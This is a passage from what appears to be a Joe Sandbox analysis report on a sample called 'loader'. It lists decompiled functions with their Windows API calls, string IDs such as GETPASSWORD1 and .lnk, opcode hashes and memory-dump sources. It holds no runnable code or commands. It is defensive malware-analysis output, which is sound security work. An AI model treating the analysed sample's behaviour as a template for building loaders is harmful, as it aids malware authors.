                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogParam
                                                                                    • String ID: GETPASSWORD1$rd$xzh
                                                                                    • API String ID: 665744214-2584188523
                                                                                    • Opcode ID: 8be93f66569c4c141e07255c0133c4a4ec0f44dd99ebafffd16ce254f4b41ed9
                                                                                    • Instruction ID: 42f2a63ab62cbbc8474e005339b0abb5d60c64ad4a59ad7f9d3d9b1be9b3b160
                                                                                    • Opcode Fuzzy Hash: 8be93f66569c4c141e07255c0133c4a4ec0f44dd99ebafffd16ce254f4b41ed9
                                                                                    • Instruction Fuzzy Hash: 19112B32A44254AADB11DE349C46BEF37DBEB05760F144029FE49EB180C7B4AD84D764
                                                                                    Function 0063D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fprintf_l_strncpy
                                                                                    • String ID: $%s$@%s
                                                                                    • API String ID: 1857242416-834177443
                                                                                    • Opcode ID: 53ee144ef30fff47929584edeb09fc24df307310f72c36fc8af89c087b322e7c
                                                                                    • Instruction ID: ee2dc01262d42d88f0bf44cf71af4f386609695682bf7599b5660dec9268c8d7
                                                                                    • Opcode Fuzzy Hash: 53ee144ef30fff47929584edeb09fc24df307310f72c36fc8af89c087b322e7c
                                                                                    • Instruction Fuzzy Hash: D921B77284024CAEEF20DEA4DC01FDE7BAAAF05304F040015F911962D2E372D649DF91
                                                                                    Function 0063124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Malloc
                                                                                    • String ID: (d$2d$A
                                                                                    • API String ID: 2696272793-223122361
                                                                                    • Opcode ID: f1865d8c6af75766a0e0f7f721aa94003862d3c920d22afe0d25e8e606251497
                                                                                    • Instruction ID: 716e0696d540ff0bc9540622b8572b231c27f2baf1b868b416f059ca6dd86d8b
                                                                                    • Opcode Fuzzy Hash: f1865d8c6af75766a0e0f7f721aa94003862d3c920d22afe0d25e8e606251497
                                                                                    • Instruction Fuzzy Hash: E10109B1D01229ABCB14CFA4D8449DFBBF9AF09300F10415AE905E7300D775DB40CB94
                                                                                    Function 0064DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                    • API String ID: 0-56093855
                                                                                    • Opcode ID: 22f63794b58caedd1bd0647ebed9cc6bf97f1b4694552e5bbf6fa88d90ab5739
                                                                                    • Instruction ID: 395d9274c4cbca8af46294ea0e4632e35ed4290dd2d99ac5a6c67f0ff5899a5a
                                                                                    • Opcode Fuzzy Hash: 22f63794b58caedd1bd0647ebed9cc6bf97f1b4694552e5bbf6fa88d90ab5739
                                                                                    • Instruction Fuzzy Hash: AA017176E44255AFDB158F58FC4899A7FABFB49394B002426F809D3330DA719C90DBA0
                                                                                    Function 00631316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0063E2E8: _swprintf.LIBCMT ref: 0063E30E
                                                                                      • Part of subcall function 0063E2E8: _strlen.LIBCMT ref: 0063E32F
                                                                                      • Part of subcall function 0063E2E8: SetDlgItemTextW.USER32(?,0066E274,?), ref: 0063E38F
                                                                                      • Part of subcall function 0063E2E8: GetWindowRect.USER32(?,?), ref: 0063E3C9
                                                                                      • Part of subcall function 0063E2E8: GetClientRect.USER32(?,?), ref: 0063E3D5
                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                    • SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                    • String ID: d$0
                                                                                    • API String ID: 2622349952-997102099
                                                                                    • Opcode ID: 20db5e78375be370b687a3a6310722b7f7e12aa32ccbfd8f42ec714b2ed6b96f
                                                                                    • Instruction ID: f98b62a0e179ba0a93ec03262afa6ed9ebb6a888c25415aa8919641070c4049d
                                                                                    • Opcode Fuzzy Hash: 20db5e78375be370b687a3a6310722b7f7e12aa32ccbfd8f42ec714b2ed6b96f
                                                                                    • Instruction Fuzzy Hash: DFF04F30104298ABEF151F648C0DBEA3F5BAF46344F048119FC4999AA1CB75CA99EB90
                                                                                    Function 00659A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 2cd596ac5c756e306358c357791e272077258f0312558ab394eda4628d4e1c95
                                                                                    • Instruction ID: b086ea05f95d9d07388d5aa051f5a7b7f3bfc04abbefbf35ca57fb591a950858
                                                                                    • Opcode Fuzzy Hash: 2cd596ac5c756e306358c357791e272077258f0312558ab394eda4628d4e1c95
                                                                                    • Instruction Fuzzy Hash: ACA12472904786DFEB25CF28C8917AEBBE6EF51311F1841ADEC859B381C2388949C764
                                                                                    Function 0064FD10 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _com_issue_error
                                                                                    • String ID:
                                                                                    • API String ID: 2162355165-0
                                                                                    • Opcode ID: 7bfafe9ddf4f4534fc7ffb5955bd20e39b69b04226782b1e60ba0e3889266ef8
                                                                                    • Instruction ID: 831f7394e532d413b6a875710b266d23e8e162372db0a52f3b52a6f55bb9f4cf
                                                                                    • Opcode Fuzzy Hash: 7bfafe9ddf4f4534fc7ffb5955bd20e39b69b04226782b1e60ba0e3889266ef8
                                                                                    • Instruction Fuzzy Hash: 7141C771A00219BBDB109F68CC45BAFBBAAEF45711F10423EF915E7391D7749900C7A5
                                                                                    Function 00652AFA Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00652B16
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00652B2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 1426506684-0
                                                                                    • Opcode ID: 883b9c7665dad11d30999f4d7b8838f0ad46d3e4405095db36af1c2fcf4bafea
                                                                                    • Instruction ID: 56896ab84a88a10697e17b3da3ccda6d59f69fd91130d7441e8a2ce8aa781f0b
                                                                                    • Opcode Fuzzy Hash: 883b9c7665dad11d30999f4d7b8838f0ad46d3e4405095db36af1c2fcf4bafea
                                                                                    • Instruction Fuzzy Hash: 5A01D83A1083236EA7552E747C959562F67EF12BBBF60173DFD10552E0FF525C089148
                                                                                    Function 0064DC3B Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064DC61
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064DC72
                                                                                    • TranslateMessage.USER32(?), ref: 0064DC7C
                                                                                    • DispatchMessageW.USER32(?), ref: 0064DC86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4217535847-0
                                                                                    • Opcode ID: 7942b8d8b8676606da03720fb2e57c787c70c5b846d4ee908aad0d761dba9856
                                                                                    • Instruction ID: e8dbd936ed95f7929667f7c34f54d9fe066fa9dd040dc8f674dbc9186c03cea1
                                                                                    • Opcode Fuzzy Hash: 7942b8d8b8676606da03720fb2e57c787c70c5b846d4ee908aad0d761dba9856
                                                                                    • Instruction Fuzzy Hash: 9FF0EC72A01229BBCB206FA5DD4DDDB7F7EEF42791B004012F50AD2261D675964AC7A0
                                                                                    Function 00641FDD Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 176396367-0
                                                                                    • Opcode ID: bb2dc3ff197378b2127c352ba583229af0b64438ced83d5025292da9cfcca5d5
                                                                                    • Instruction ID: fc37031593e43939704f188bf132c1b2daa717c089168a8fe079198628263b87
                                                                                    • Opcode Fuzzy Hash: bb2dc3ff197378b2127c352ba583229af0b64438ced83d5025292da9cfcca5d5
                                                                                    • Instruction Fuzzy Hash: 3DF06232408024BBCF221F90EC09D8A7F67DB41B61F21800AF9155B161CB729A65D694
                                                                                    Function 0064A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0064A666
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0064A675
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0064A683
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0064A691
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: 82175a8aa3a462ca394c916ef92ab766bcb9f2f3231b18514d87000c9ee29b1e
                                                                                    • Instruction ID: 11d55824fa874948a0fcc1196d56eb8123a42d7229bda48248b4def04b20cfc5
                                                                                    • Opcode Fuzzy Hash: 82175a8aa3a462ca394c916ef92ab766bcb9f2f3231b18514d87000c9ee29b1e
                                                                                    • Instruction Fuzzy Hash: 76E0E631982731BBD3515F706D0DB8B3E5DAB15B52F011102F605A7694DB6449408B95
                                                                                    Function 0064D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: .lnk$dd
                                                                                    • API String ID: 2691759472-4022110313
                                                                                    • Opcode ID: 50a8fa6c07983a4a204ff9161a5f60daa0e3ff7d09a177d0675bfa1b8e1230fc
                                                                                    • Instruction ID: e87cc7750f64b064a1c78800994ed7ad5c1e6dda4025bb46fdd97512d6342605
                                                                                    • Opcode Fuzzy Hash: 50a8fa6c07983a4a204ff9161a5f60daa0e3ff7d09a177d0675bfa1b8e1230fc
                                                                                    • Instruction Fuzzy Hash: 9CA17472D0012996DF24EBA0CD45EFB73FEAF45304F0885A6F609E7141EE749B858B64
                                                                                    Function 0065B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID: *?$.
                                                                                    • API String ID: 269201875-3972193922
                                                                                    • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
